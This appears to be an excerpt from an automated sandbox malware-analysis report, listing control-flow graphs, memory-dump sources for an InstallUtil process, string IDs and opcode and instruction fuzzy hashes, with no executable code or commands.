                                                  control_flow_graph 2362 105c147-105c158 2363 105c184 2362->2363 2364 105c15a-105c172 2362->2364 2365 105c186-105c18a 2363->2365 2368 105c174-105c179 2364->2368 2369 105c17b-105c17e 2364->2369 2368->2365 2370 105c180-105c182 2369->2370 2371 105c18b-105c199 2369->2371 2370->2363 2370->2364 2373 105c1a5-105c1a8 2371->2373 2374 105c19b-105c19d 2371->2374 2376 105c1a9-105c1ac 2373->2376 2375 105c19f-105c1a1 2374->2375 2374->2376 2377 105c1a3 2375->2377 2378 105c1ad-105c1c8 2375->2378 2376->2378 2377->2373 2379 105c1cf-105c2ac call 10541a0 call 1053cc0 2378->2379 2380 105c1ca 2378->2380 2390 105c2b3-105c2d4 call 1055658 2379->2390 2391 105c2ae 2379->2391 2380->2379 2393 105c2d9-105c2e4 2390->2393 2391->2390 2394 105c2e6 2393->2394 2395 105c2eb-105c2ef 2393->2395 2394->2395 2396 105c2f4-105c2fb 2395->2396 2397 105c2f1-105c2f2 2395->2397 2398 105c302-105c310 2396->2398 2399 105c2fd 2396->2399 2400 105c313-105c357 2397->2400 2398->2400 2399->2398 2404 105c3bd-105c3d4 2400->2404 2406 105c3d6-105c3fb 2404->2406 2407 105c359-105c36f 2404->2407 2414 105c413 2406->2414 2415 105c3fd-105c412 2406->2415 2411 105c371-105c37d 2407->2411 2412 105c399 2407->2412 2416 105c387-105c38d 2411->2416 2417 105c37f-105c385 2411->2417 2413 105c39f-105c3bc 2412->2413 2413->2404 2415->2414 2418 105c397 2416->2418 2417->2418 2418->2413
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: 86cf382509fb381057f538c4d96331742c44bc4961ccff6b993262c673a19262
                                                  • Instruction ID: 6a11a75cc4a96b9cb04b2940b58a6102bf8a1a9eaaa093ad771fccaa3850256d
                                                  • Opcode Fuzzy Hash: 86cf382509fb381057f538c4d96331742c44bc4961ccff6b993262c673a19262
                                                  • Instruction Fuzzy Hash: 4EA1E974E00258CFEB54CFA9D984A9EBBF6FF89310F148069E848AB365DB309941CF50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2422 105d278-105d2a8 2423 105d2af-105d38c call 10541a0 call 1053cc0 2422->2423 2424 105d2aa 2422->2424 2434 105d393-105d3b4 call 1055658 2423->2434 2435 105d38e 2423->2435 2424->2423 2437 105d3b9-105d3c4 2434->2437 2435->2434 2438 105d3c6 2437->2438 2439 105d3cb-105d3cf 2437->2439 2438->2439 2440 105d3d4-105d3db 2439->2440 2441 105d3d1-105d3d2 2439->2441 2443 105d3e2-105d3f0 2440->2443 2444 105d3dd 2440->2444 2442 105d3f3-105d437 2441->2442 2448 105d49d-105d4b4 2442->2448 2443->2442 2444->2443 2450 105d4b6-105d4db 2448->2450 2451 105d439-105d44f 2448->2451 2458 105d4f3 2450->2458 2459 105d4dd-105d4f2 2450->2459 2455 105d451-105d45d 2451->2455 2456 105d479 2451->2456 2460 105d467-105d46d 2455->2460 2461 105d45f-105d465 2455->2461 2457 105d47f-105d49c 2456->2457 2457->2448 2459->2458 2462 105d477 2460->2462 2461->2462 2462->2457
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: f115d75858b9b2bf6812737838f2c7ee3b378750c0bb3619a1b4c29bee1dadf7
                                                  • Instruction ID: 26138cbef96da6401f0ae9201571c4b698c7f06ef0d7b6a17b3e499ace5caf28
                                                  • Opcode Fuzzy Hash: f115d75858b9b2bf6812737838f2c7ee3b378750c0bb3619a1b4c29bee1dadf7
                                                  • Instruction Fuzzy Hash: 1B819574E00258CFDB54DFAAD854A9EBBF2BF89300F14C06AD859AB365DB309945CF50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2466 105ca08-105ca38 2468 105ca3f-105cb1c call 10541a0 call 1053cc0 2466->2468 2469 105ca3a 2466->2469 2479 105cb23-105cb44 call 1055658 2468->2479 2480 105cb1e 2468->2480 2469->2468 2482 105cb49-105cb54 2479->2482 2480->2479 2483 105cb56 2482->2483 2484 105cb5b-105cb5f 2482->2484 2483->2484 2485 105cb64-105cb6b 2484->2485 2486 105cb61-105cb62 2484->2486 2488 105cb72-105cb80 2485->2488 2489 105cb6d 2485->2489 2487 105cb83-105cbc7 2486->2487 2493 105cc2d-105cc44 2487->2493 2488->2487 2489->2488 2495 105cc46-105cc6b 2493->2495 2496 105cbc9-105cbdf 2493->2496 2502 105cc83 2495->2502 2503 105cc6d-105cc82 2495->2503 2500 105cbe1-105cbed 2496->2500 2501 105cc09 2496->2501 2504 105cbf7-105cbfd 2500->2504 2505 105cbef-105cbf5 2500->2505 2506 105cc0f-105cc2c 2501->2506 2503->2502 2507 105cc07 2504->2507 2505->2507 2506->2493 2507->2506
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: 76a8a3bed603c462ad2bba9f895e772aa5cc50d6bf2905a407da9b42ce7dc345
                                                  • Instruction ID: dc18e4f2a69f6764ca0526594820e2fb500461c92d73157a0eb998205df8be60
                                                  • Opcode Fuzzy Hash: 76a8a3bed603c462ad2bba9f895e772aa5cc50d6bf2905a407da9b42ce7dc345
                                                  • Instruction Fuzzy Hash: 4681C674E00258CFEB54DFAAD944A9EBBF2BF89300F14C069E858AB365DB309945CF50

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: e97734002d300be87ecae603114bc16b884d56699d249d2bc14935b8e3078e11
                                                  • Instruction ID: 5c33af2f7b176fc3aee4c812ca42947b5d2926f8721e341ff25f0be3fdbc4047
                                                  • Opcode Fuzzy Hash: e97734002d300be87ecae603114bc16b884d56699d249d2bc14935b8e3078e11
                                                  • Instruction Fuzzy Hash: 0181B274E00218CFDB54DFAAD994A9EBBF2FF88300F148069E849AB365DB309945CF50

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: 73f04e40f75e86d32bb9d840c29038fd19f493d8348c904c038e36307c95958a
                                                  • Instruction ID: 24ae0cf0b6caa7634a002456f399bc4179bbc1e8a4e5c4dc4c40e6a4a9e038cf
                                                  • Opcode Fuzzy Hash: 73f04e40f75e86d32bb9d840c29038fd19f493d8348c904c038e36307c95958a
                                                  • Instruction Fuzzy Hash: C481C774E00258CFEB54DFAAD944A9EBBF2BF89300F14C069E849AB365DB305945CF50

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: f5e8190239c56c10e71afd3dc93e30f0cc9bcb009549671e6a23aa2842b325d0
                                                  • Instruction ID: 019d5d8f14813e57005c554d91d729e2c2b7b7db4a022ba132e1343a57817c9a
                                                  • Opcode Fuzzy Hash: f5e8190239c56c10e71afd3dc93e30f0cc9bcb009549671e6a23aa2842b325d0
                                                  • Instruction Fuzzy Hash: 3781B474E00258CFEB54DFAAD984A9EBBF2BF89310F14C069D858AB365DB309941CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH]q$PH]q
                                                  • API String ID: 0-1166926398
                                                  • Opcode ID: 191a81213f8c22215cf86078c348b8de62c2790618e758ee550a57312970723a
                                                  • Instruction ID: 5a5872c0df2423d24b5c1d92733b80f34a1428f3bb67d089ab602a5f143555e6
                                                  • Opcode Fuzzy Hash: 191a81213f8c22215cf86078c348b8de62c2790618e758ee550a57312970723a
                                                  • Instruction Fuzzy Hash: 4E81B774E00258CFEB54DFAAD944A9EBBF2BF88300F14D069D859AB365DB309985CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1271b6574ba506fc8d1456eb5f49392189b2c6b6468df6da79363434be378bfe
                                                  • Instruction ID: 5b854959ce26e97382c4f76e2b0b55ad5e8e4bcad182be3da759b68acce2bb18
                                                  • Opcode Fuzzy Hash: 1271b6574ba506fc8d1456eb5f49392189b2c6b6468df6da79363434be378bfe
                                                  • Instruction Fuzzy Hash: FF51C574E00208DFDB48DFAAD544A9EBBB2FF89300F24C069E859AB365DB345942CF14
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94cddb2af4c8cf1841ba5cfa181a2d29a0df654526fe766fac0f9c7aed8a6c49
                                                  • Instruction ID: 778006f04adfa943fb003cdcffce68f2dfa433182f152adeb0dd75e853531d89
                                                  • Opcode Fuzzy Hash: 94cddb2af4c8cf1841ba5cfa181a2d29a0df654526fe766fac0f9c7aed8a6c49
                                                  • Instruction Fuzzy Hash: 5F519274E00208DFDB58DFAAD594A9EFBB6FF89300F208429E819AB365DB345945CF14

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                  • API String ID: 0-1435242062
                                                  • Opcode ID: 395c7d6d8a8d8286ba4e41a0883f165c60031d7188115c81d7a9c57697a8fab9
                                                  • Instruction ID: 80ed369fce22fef136538ff7c23a078985a7ff60a5b37204ec256acb95cbb124
                                                  • Opcode Fuzzy Hash: 395c7d6d8a8d8286ba4e41a0883f165c60031d7188115c81d7a9c57697a8fab9
                                                  • Instruction Fuzzy Hash: F9128C30A002098FDB95CF68D984AAEBBF6FF89314F548599E985DB362D730ED41CB50

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Haq$Haq
                                                  • API String ID: 0-4016896955
                                                  • Opcode ID: 3863e48ff07f207507ef31961f252b7f55284fb57864f82e6cee086ce56b3540
                                                  • Instruction ID: 0ad13699346c41381fe08ac00af1b7144677e1624d7208aaca1f26f59b3c8a7e
                                                  • Opcode Fuzzy Hash: 3863e48ff07f207507ef31961f252b7f55284fb57864f82e6cee086ce56b3540
                                                  • Instruction Fuzzy Hash: 079182303082558FDB559F28C85467F7BE6BF89301F1844A9E9868B396DF3ACD42C791

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,aq$,aq
                                                  • API String ID: 0-2990736959
                                                  • Opcode ID: 58f9d2a3c76457160411d0357d6e83a6aa526701d829e5afa55a9dd1355ab491
                                                  • Instruction ID: 448ced5411a68b8766c2664de8c40345fdadd2f44365d559e754c84f0e527256
                                                  • Opcode Fuzzy Hash: 58f9d2a3c76457160411d0357d6e83a6aa526701d829e5afa55a9dd1355ab491
                                                  • Instruction Fuzzy Hash: B1819C34A005068FDB98CF6DC49496FBBF2BF89204B9481A9D985D7365DB32EC41CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Xaq$Xaq
                                                  • API String ID: 0-1488805882
                                                  • Opcode ID: a3362180515210d0a9657a7fbaf6c6639e668f436bbc797b97f139d86b930632
                                                  • Instruction ID: 08246ea2f2220c0ae156dea0db87147abf466123f1af4b8750e8529fb0be41b3
                                                  • Opcode Fuzzy Hash: a3362180515210d0a9657a7fbaf6c6639e668f436bbc797b97f139d86b930632
                                                  • Instruction Fuzzy Hash: B93126317002298BDB996A6EA99427FA9FABBC0380F144439DC86CB394DB75CC058361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: 8c74f7b701eff6a5e0285d87ccedb4f851d46ab4a3cf71c372000a9b5a029140
                                                  • Instruction ID: 047208d2a1db02b27cbdc724b188a815618ac93c48283e30b614dbbdcc879fde
                                                  • Opcode Fuzzy Hash: 8c74f7b701eff6a5e0285d87ccedb4f851d46ab4a3cf71c372000a9b5a029140
                                                  • Instruction Fuzzy Hash: 17F086353001056FDB582AA9985096B6ACBEBDC250B048425BA8AC7350DE65CC01C3A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q
                                                  • API String ID: 0-3081347316
                                                  • Opcode ID: 5f56f8f3eab812b6f0aef0885f34ce62fe25b63c15be87e4c049533409e30e9e
                                                  • Instruction ID: 1b58bcc5bb32e6633546d22311158d23ed51e93e61a1baa8ff2a56da11b96696
                                                  • Opcode Fuzzy Hash: 5f56f8f3eab812b6f0aef0885f34ce62fe25b63c15be87e4c049533409e30e9e
                                                  • Instruction Fuzzy Hash: 3152B878900219CFCB54EF68E994BADBBB2FF88305F1085A5D449A7368DB345E86CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q
                                                  • API String ID: 0-3081347316
                                                  • Opcode ID: ea3dcf704e32f2f778cd718c23647a7d4d48142fc78446203770b591298b1729
                                                  • Instruction ID: e9ee05c1574e24f0373a80a2f138707766930960aab82bb2e744f66962e4823e
                                                  • Opcode Fuzzy Hash: ea3dcf704e32f2f778cd718c23647a7d4d48142fc78446203770b591298b1729
                                                  • Instruction Fuzzy Hash: AD52B878900219CFCB54EF68E994BADBBB2FF88301F1085A5D549A7368DB345E86CF50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: afb8afa35f3e1e6ab7f07a775d9760c5c3880934542918ec6ce3d08359d92c8e
                                                  • Instruction ID: e7f58aba609efd77b7e8de1f85dbdb5b9e1ad4d38e2db30e6866e6d9ec3ecc5a
                                                  • Opcode Fuzzy Hash: afb8afa35f3e1e6ab7f07a775d9760c5c3880934542918ec6ce3d08359d92c8e
                                                  • Instruction Fuzzy Hash: 581295340297539FE6603B34E6AC12EBA60FB5F767314AC10B1CFC0559EB7A1499CB26
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54195e0400270c77fe559e2a0ee7b1dd3333f4acaeb194021e60c2df33739641
                                                  • Instruction ID: d16322dfec2946b0bf5bfb60e7bca2807e1994162c9c63dda5763b99ba466e07
                                                  • Opcode Fuzzy Hash: 54195e0400270c77fe559e2a0ee7b1dd3333f4acaeb194021e60c2df33739641
                                                  • Instruction Fuzzy Hash: 511295340297539FA6603B34E6AC12EBA60FB5F767314AC10B1CFC0559EF7A1499CB26
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4494788125.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_1050000_InstallUtil.jbxd